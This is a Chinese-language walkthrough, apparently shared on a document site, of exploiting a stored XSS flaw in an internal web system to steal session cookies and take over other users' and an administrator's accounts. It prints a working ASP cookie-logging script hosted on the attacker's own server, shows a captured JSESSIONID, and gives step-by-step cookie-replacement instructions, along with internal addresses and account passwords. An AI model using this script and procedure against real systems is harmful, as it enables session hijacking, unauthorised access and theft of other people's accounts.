利用xss漏洞获取cookie
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
利用xss漏洞获取cookie得到管理员权限
注:不要外部传播,因为这类问题开发一直没改,被发现我会被开除的。
一.检测xss漏洞
内网,漏洞界面截图:
我在标题和内容里输入了,保存,结果打开有xss的弹出框,经过确定是标题栏存在xss漏洞,而内容栏已经被过滤。
二.部署偷取cookie
1.安装IIS
我是windows 2003的,插入系统盘,控制面板,添加/删除windows组件,应用程序服务器,IIS在这里,安装好后,建立站点,也就选择主目录,首页等配置,这部分内容网上都有的,大学也学过的。
2.编写偷取cookie的代码
代码如下:
<%
msg=Request.ServerVariables("QUERY_STRING")
testfile=Server.MapPath("cook.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.Writeline(""&msg& "")
thisfile.close
set fs = nothing
%>
在iis部署公网能访问的目录下新建个文本,命名为s.asp,把以上代码复制进去。代码我也不是很看到懂。估计就是把返回的内容写在cook.txt这个文件里吧。
3.用我自己的帐号show/12345678登录(昵称是:我的帐号),找到刚才存在xss漏洞的
界面,新建,在标题栏里输入:
因为标题字数做了限制100字符,所以我把上面的代码后半部分去除了,修改为:
这里的s.asp就是上面部署新建的那个。估计意思就是把cookie返回到s.asp这个页面吧。
然后保存,这条记录是系统内所有用户都能看见的,类似通知。保存后记录显示结果:
其他用户(我这里是show2/12345678昵称为:被盗的帐号)点击记录后显示如图:
点击其实有访问s.asp页面,然后这个页面把cookie写入了cook.txt这个文件。
这时我们找到本地s.asp当前目录下,会自动生成一个cook.txt文件,打开,显示的内容如下:
msg=JSESSIONID=31D68F7A3B043ECA887216C3F285A7C4
这就是我们偷取的东西。
三.修改cookie
我下载了firefox 3.0.11 版本的浏览器,并下载了一个可以修改cookie的插件,叫:Add N Edit Cookies ,注:该插件不支持firefox 3.6版本,下载插件后,打开firefox直接把插件托进去就可以安装起来了。插件和firefox网上均有下载,还是好找到。
打开firefox,进去系统(http://192.168.1.122/fpf/login/index.action),我用自己的帐号show/12345678 登录
然后firefox 工具菜单下面有一项叫Cookie Editor,就是刚才安装的插件,打开后如图:
找到对应的那条记录,这里是192.168.1.122,JSESSIONID 这项。点击下方的Edit ,如图:
把这里的Content部分修改为刚才cook.txt里的内容:
31D68F7A3B043ECA887216C3F285A7C4
然后Save。关闭插件。
点击下刷新,就变成了show2/12345678 这个帐号了,而且权限也变了,可是使用,同样的方法获得了管理员的帐号。
如图我自己的帐号:
被盗了cookie,修改cookie刷新后变成了该帐号: